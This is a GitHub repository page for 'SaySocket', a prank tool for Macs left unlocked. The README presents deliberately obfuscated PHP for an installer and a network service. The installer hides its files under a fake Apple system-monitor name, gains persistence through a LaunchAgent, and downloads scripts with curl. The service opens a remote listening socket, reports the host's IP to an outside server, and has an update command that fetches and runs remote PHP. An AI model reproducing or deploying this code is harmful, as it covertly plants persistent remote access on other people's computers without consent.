Troll script for OSX written in PHP
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
bin
inc
public
.gitignore
LICENSE
README.md

README.md

SaySocket

Have friends who own a Mac? Do they leave it unlocked? Give life to their Mac, make it speak!

Visit saysocket.com to try it now!

The Pieces

  • The say command.
    • say is a text-to-speech command available on OSX
  • PHP 5
    • PHP 5+ comes pre-installed on recent versions of OSX

The Goal

  • Build a service wrapper to access say command remotely

The Reason

  • It's fucking hilarious

The Details

  • This was built with little to no design effort. Shit popped into my head, and was added to this project.
  • This project utilizes my other useless PHP project PHPuny
  • PHPuny is a PHP minifier
  • Ya, I know minifying PHP is essentially pointless
  • The purpose of minifying the SaySocket code, is to make it as obscure as possible
  • Obfuscation gets even more ridiculous, all (most) strings are reverse-base64 encoded
    • Example: The string poop will be represented as base64_decode('cG9vcA==')

The Result

  • The resulting files look like this:
    • Installer:
    <?php
    define('CN','xxxxxxxxx');define('CO',$_SERVER['HOME']);define('CP',base64_decode('LkFwcGxlU3lzdGVtTW9uaXRvcg=='));define('CQ',CO.'/'.CP);define('CR',CQ.'/'.base64_decode('Ymlu'));define('CS',CR.'/'.base64_decode('Y3Rs'));define('CT',CR.'/'.base64_decode('bW9uaXRvcg=='));define('CU',CO.'/'.base64_decode('TGlicmFyeS9MYXVuY2hBZ2VudHM=').'/'.base64_decode('Y29tLmFwcGxlLnN5c3RlbS5tb25pdG9y').'.plist');define('CV',CO.'/'.base64_decode('LmJpbg=='));define('CW',preg_quote(CV,'/'));define('CX',CV.'/'.base64_decode('c3NfaW5zdGFsbA=='));define('CY',CV.'/'.base64_decode('c3NfcmVtb3Zl'));if(trim(CN)==''){die();}$va=base64_decode('LmJhc2hfcHJvZmlsZQ==');$vb=array(base64_decode('LnpzaHJj'));foreach($vb as $vc){if(file_exists(CO."/$vc")){$va=$vc;}}define('CZ',CO."/$va");if(!file_exists(CZ)||!preg_match('/PATH.*'.CW.'/',file_get_contents(CZ))){exec('echo "export PATH=\$'.'PATH:'.CV.'" >> '.CZ);}$vd=array(CQ,CR,CV);foreach($vd as $ve){if(!is_dir($ve)){mkdir($ve);}}if(!file_exists(CS)){copy(base64_decode('L3Vzci9iaW4vcGhw'),CS);}copy(__FILE__,CX);$vf=array('r'=>CY,'g'=>CT,'l'=>CU);foreach($vf as $vg=>$vh){exec('curl -s -o '.$vh.' '.base64_decode('aHR0cDovL3NheXNvY2tldC5jb20v').$vg.'.php?h='.CN);}$vi=array(CU=>array('{{MONITOR}}'=>CT,'{{BINARY_LOCATION}}'=>CS));foreach($vi as $vh=>$vj){$vk=file_get_contents($vh);foreach($vj as $vl=>$vm){$vk=str_replace($vl,$vm,$vk);}file_put_contents($vh,$vk);}exec('chmod +x '.CS.' '.CX.' '.CY.' '.CT);exec('launchctl load '.CU);
    • Service:
    <?php
    define('CAJ',base64_decode('L14oKFswLTldfFsxLTldWzAtOV18MVswLTldezJ9fDJbMC00XVswLTldfDI1WzAtNV0pXC4pezN9KFswLTldfFsxLTldWzAtOV18MVswLTldezJ9fDJbMC00XVswLTldfDI1WzAtNV0pJC8='));define('CAK',base64_decode('L15bYS16QS1aMC05XHMsJ1wuXSskLw=='));define('CAL',base64_decode('L15xdWl0fGV4aXR8c2h1dGRvd24kL2k='));define('CAM',base64_decode('L151cGRhdGUkL2k='));define('CAN',base64_decode('L15yaWNrcm9sbCQvaQ=='));define('CAO',base64_decode('L152b2ljZXMkL2k='));define('CAP',base64_decode('L152b2ljZSQvaQ=='));define('CAQ',base64_decode('L152b2ljZSAoW2Etel0rKSQvaQ=='));define('CAR',base64_decode('L152b2x1bWUgKFxkKSQvaQ=='));define('CAS',base64_decode('MTAyNA=='));define('CAT',base64_decode('NjU1MzU='));define('CAU',base64_decode('MTIzNDU='));define('CAV',base64_decode('c2F5PiA='));if($vh=fd($argv[0])){exec("kill $vh");}$vi=fc();$vj=count($vi)>0?$vi[0]:base64_decode('YWxleA==');set_time_limit(0);ob_implicit_flush();$vk='0.0.0.0';$vl=CAU;global $vm;$vm=array(base64_decode('aXA=')=>fb(),base64_decode('cG9ydA==')=>$vl,base64_decode('aA==')=>'xxxxxxxxx');(preg_match(CAJ,$vk))or die();(is_numeric($vl)&&$vl>CAS&&$vl<CAT)or die();if(($vn=socket_create(AF_INET,SOCK_STREAM,SOL_TCP))===false){die();}socket_set_option($vn,SOL_SOCKET,SO_REUSEADDR,1);socket_set_option($vn,SOL_SOCKET,SO_REUSEPORT,1);if(socket_bind($vn,$vk,$vl)===false){socket_shutdown($vn);socket_close($vn);die();}if(socket_listen($vn,5)===false){socket_shutdown($vn);socket_close($vn);die();}exec(fe('m'));do{if(($vo=socket_accept($vn))===false){socket_shutdown($vn);socket_close($vn);break;}$vp=base64_decode('DQogX19fXyAgICAgICAgICAgICAgICBfX19fICAgICAgICAgICAgIF8gICAgICAgIF8NCi8gX19ffCAgX18gXyBfICAgXyAgLyBfX198ICBfX18gICBfX198IHwgX19fX198IHxfDQpcX19fIFwgLyBfYCB8IHwgfCB8IFxfX18gXCAvIF8gXCAvIF9ffCB8LyAvIF8gXCBfX3wNCiBfX18pIHwgKF98IHwgfF98IHwgIF9fXykgfCAoXykgfCAoX198ICAgPCAgX18vIHxfDQp8X19fXy8gXF9fLF98XF9fLCB8IHxfX19fLyBcX19fLyBcX19ffF98XF9cX19ffFxfX3wNCiAgICAgICAgICAgICB8X19fLw0KDQpUeXBlIGFueXRoaW5nIHRvIHNheSBpdCB0aHJvdWdoIHRoZSBzb2NrZXQuDQpUbyBxdWl0LCB0eXBlICdxdWl0JywgJ2V4aXQnLCBvciAnc2h1dGRvd24nLg0K').CAV;socket_write($vo,$vp,strlen($vp));do{$vp='';if(false===($vq=socket_read($vo,2048,PHP_NORMAL_READ))){break;}if(!$vq=trim($vq)){continue;}$vq=trim(strtolower($vq),' _-[]()"\'');if(preg_match(CAL,$vq)){break;}else if(preg_match(CAM,$vq)){exec(base64_decode('cGhwIDwoY3VybCAtcyAiaHR0cDovL3NheXNvY2tldC5jb20vaS5waHA/aD1mYmJjNTNlYjc5MGRhYjE3IikK'));die();}else if(preg_match(CAN,$vq)){fg(7);ff(base64_decode('aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1vSGc1U0pZUkhBMA=='));}else if(preg_match(CAO,$vq)){foreach($vi as $vr){$vp.=$vr."\r\n";}}else if(preg_match(CAP,$vq,$vs)||preg_match(CAQ,$vq,$vs)){if(isset($vs[1])){$vr=$vs[1];if(in_array($vr,$vi)){$vj=$vr;}else{$vp.=base64_decode('Vm9pY2UgZG9lcyBub3QgZXhpc3QuIFVzZSAndm9pY2VzJyBjb21tYW5kIHRvIHNlZSBhIGxpc3Qgb2YgYXZhaWxhYmxlIHZvaWNlcw0K');}}$vp.=base64_decode('Q3VycmVudCB2b2ljZSBpczo=')." $vj\r\n";}else if(preg_match(CAR,$vq,$vs)){if(isset($vs[1])&&is_numeric($vs[1])){fg($vs[1]);}}else if(preg_match(CAK,$vq)){if(!fa($vq)){$vt=base64_decode('c2F5IC12')." $vj '$vq'";exec($vt);}else{$vp.=base64_decode('Q2Fubm90IHNheTo=')." '$vq', ".base64_decode('Y29tbWFuZCBleGlzdHMNCg==');}}else{$vp.=base64_decode('Q2Fubm90IHNheTo=')." '$vq', ".base64_decode('c3RyaW5nIGlzIHRvbyBjb21wbGV4DQo=');}$vp.=CAV;socket_write($vo,$vp,strlen($vp));}while(true);socket_close($vo);}while(true);function fa($vt){$vu=shell_exec(base64_decode('d2hpY2g=')." $vt");return(empty($vu)?false:true);}function fb(){for($vv=0;$vv<10;$vv++){$vt=base64_decode('aXBjb25maWc=').' '.base64_decode('Z2V0aWZhZGRy').' '.base64_decode('ZW4=').$vv;$vw=trim(exec($vt));if(preg_match(CAJ,$vw)){return $vw;}}return(base64_decode('MTI3LjAuMC4x'));}function fc(){$vi=array();$vt=base64_decode('c2F5IC12')." '?'";$vx=`$vt`;$vs=explode("\n",$vx);foreach($vs as $vy){$vz=explode(' ',$vy);if(isset($vz[0])){$vr=strtolower(trim($vz[0]));if($vr!=''){$vi[]=strtolower(trim($vz[0]));}}}return $vi;}function fd($vaa){$vt=base64_decode('cHMgYXV4');$vab=`$vt`;$vac=false;$vad='#'.get_current_user().'\s+(\d+)\s+.*'.preg_quote($vaa).'$#';foreach(explode("\n",$vab)as $vae){$vae=trim($vae);if(preg_match_all($vad,$vae,$vaf)){if(isset($vaf[1][0])){$vh=$vaf[1][0];if($vh!=getmypid()){return $vh;}}}}return false;}function fe($vag='m'){global $vm;if(in_array($vag,array('m','p'))){$vah=base64_decode('aHR0cDovL3NheXNvY2tldC5jb20v')."{$vag}.php?";$vah.=http_build_query($vm);return(base64_decode('Y3VybCAtcw==')." '$vah'");}return false;}function ff($vah){$vt=base64_decode('b3Blbg==').' "'.$vah.'"';exec($vt);}function fg($vai){if(is_numeric($vai)){$vai=(int)$vai;if($vai>9)$vai=9;if($vai<0)$vai=0;$vt=base64_decode('b3Nhc2NyaXB0IC1l').' "'.base64_decode('c2V0IFZvbHVtZQ==').' '.$vai.'"';exec($vt);}}